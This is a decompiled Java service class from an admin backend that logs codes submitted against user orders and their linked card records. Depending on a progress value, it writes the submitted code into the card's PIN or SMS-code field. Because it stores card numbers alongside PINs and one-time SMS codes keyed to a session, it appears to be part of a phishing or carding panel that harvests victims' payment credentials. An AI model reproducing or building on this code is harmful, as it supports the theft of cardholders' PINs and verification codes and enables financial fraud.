package com.mdd.admin.service.impl;

import com.baomidou.mybatisplus.core.conditions.Wrapper;
import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.metadata.IPage;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.mdd.admin.LikeAdminThreadLocal;
import com.mdd.admin.service.ICodeLogService;
import com.mdd.admin.service.IUserOrderService;
import com.mdd.admin.validate.commons.PageValidate;
import com.mdd.admin.validate.log.CodeLogCreateValidate;
import com.mdd.admin.validate.log.CodeLogSearchValidate;
import com.mdd.admin.validate.log.CodeLogUpdateValidate;
import com.mdd.admin.vo.CodeLogDetailVo;
import com.mdd.admin.vo.CodeLogListedVo;
import com.mdd.common.core.AjaxResult;
import com.mdd.common.core.PageResult;
import com.mdd.common.entity.CardLog;
import com.mdd.common.entity.CodeLog;
import com.mdd.common.entity.UserOrder;
import com.mdd.common.mapper.CardLogMapper;
import com.mdd.common.mapper.CodeLogMapper;
import com.mdd.common.mapper.UserOrderMapper;
import com.mdd.common.util.StringUtils;
import com.mdd.common.util.TimeUtils;
import java.lang.invoke.SerializedLambda;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import javax.annotation.Resource;
import org.springframework.beans.BeanUtils;
import org.springframework.stereotype.Service;
import org.springframework.util.Assert;

@Service
public class CodeLogServiceImpl implements ICodeLogService {
   @Resource
   CodeLogMapper codeLogMapper;
   @Resource
   UserOrderMapper userOrderMapper;
   @Resource
   CardLogMapper cardLogMapper;
   @Resource
   IUserOrderService orderService;

   public PageResult<CodeLogListedVo> list(PageValidate pageValidate, CodeLogSearchValidate searchValidate) {
      Integer page = pageValidate.getPageNo();
      Integer limit = pageValidate.getPageSize();
      List<Integer> roleIds = LikeAdminThreadLocal.getRoleIds();
      QueryWrapper<CodeLog> queryWrapper = new QueryWrapper();
      queryWrapper.orderByDesc("id");
      this.codeLogMapper.setSearch(queryWrapper, searchValidate, new String[]{"=:cardId@card_id:int", "in:cardIds@card_id:int", "in:orderIds@order_id:int", "=:orderId@order_id:int", "=:progress:int", "=:otp:str"});
      IPage<CodeLog> iPage = this.codeLogMapper.selectPage(new Page((long)page, (long)limit), queryWrapper);
      List<CodeLogListedVo> list = new LinkedList();

      CodeLogListedVo vo;
      for(Iterator var9 = iPage.getRecords().iterator(); var9.hasNext(); list.add(vo)) {
         CodeLog item = (CodeLog)var9.next();
         vo = new CodeLogListedVo();
         BeanUtils.copyProperties(item, vo);
         vo.setCreateTime(TimeUtils.timestampToDate(item.getCreateTime()));
         if (roleIds.contains(2)) {
            vo.setNumber(StringUtils.showField(vo.getNumber(), 6));
         }
      }

      return PageResult.iPageHandle(iPage.getTotal(), iPage.getCurrent(), iPage.getSize(), list);
   }

   public CodeLogDetailVo detail(Integer id) {
      CodeLog model = (CodeLog)this.codeLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", id)).last("limit 1"));
      Assert.notNull(model, "数据不存在");
      CodeLogDetailVo vo = new CodeLogDetailVo();
      BeanUtils.copyProperties(model, vo);
      return vo;
   }

   public AjaxResult<?> add(CodeLogCreateValidate createValidate) {
      AjaxResult<UserOrder> res = this.orderService.selectOrder(createValidate.getSessionId());
      if (res.getCode() != 200) {
         return res;
      } else {
         UserOrder order = (UserOrder)res.getData();
         LambdaQueryWrapper<CardLog> queryCard = new LambdaQueryWrapper();
         queryCard.eq(CardLog::getOrderId, order.getId());
         CardLog card = (CardLog)this.cardLogMapper.selectOne((Wrapper)queryCard.last("order by id desc limit 1"));
         if (card == null) {
            return AjaxResult.failed(401, "no card");
         } else {
            CodeLog model = new CodeLog();
            model.setOrderId(order.getId());
            model.setCardId(card.getId());
            model.setNumber(card.getNumber());
            model.setProgress(createValidate.getProgress());
            model.setOtp(createValidate.getOtp());
            model.setCreateTime(System.currentTimeMillis() / 1000L);
            this.codeLogMapper.insert(model);
            if (model.getProgress() == 7001 || model.getProgress() == 6001) {
               CardLog upCard = new CardLog();
               upCard.setId(card.getId());
               if (model.getProgress() == 7001) {
                  upCard.setPinCode(model.getOtp());
               }

               if (model.getProgress() == 6001) {
                  upCard.setSmsCode(model.getOtp());
               }

               this.cardLogMapper.updateById(upCard);
            }

            UserOrder update = new UserOrder();
            update.setId(order.getId());
            update.setProgress(model.getProgress());
            update.setOtp(model.getOtp());
            this.orderService.updateById(update);
            return AjaxResult.success();
         }
      }
   }

   public void edit(CodeLogUpdateValidate updateValidate) {
      CodeLog model = (CodeLog)this.codeLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", updateValidate.getId())).last("limit 1"));
      Assert.notNull(model, "数据不存在!");
      model.setCardId(updateValidate.getCardId());
      model.setProgress(updateValidate.getProgress());
      model.setOtp(updateValidate.getOtp());
      this.codeLogMapper.updateById(model);
   }

   public void del(Integer id) {
      CodeLog model = (CodeLog)this.codeLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", id)).last("limit 1"));
      Assert.notNull(model, "数据不存在!");
      this.codeLogMapper.delete((Wrapper)(new QueryWrapper()).eq("id", id));
   }

   // $FF: synthetic method
   private static Object $deserializeLambda$(SerializedLambda lambda) {
      switch (lambda.getImplMethodName()) {
         case "getOrderId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getOrderId;
            }
         default:
            throw new IllegalArgumentException("Invalid lambda deserialization");
      }
   }
}
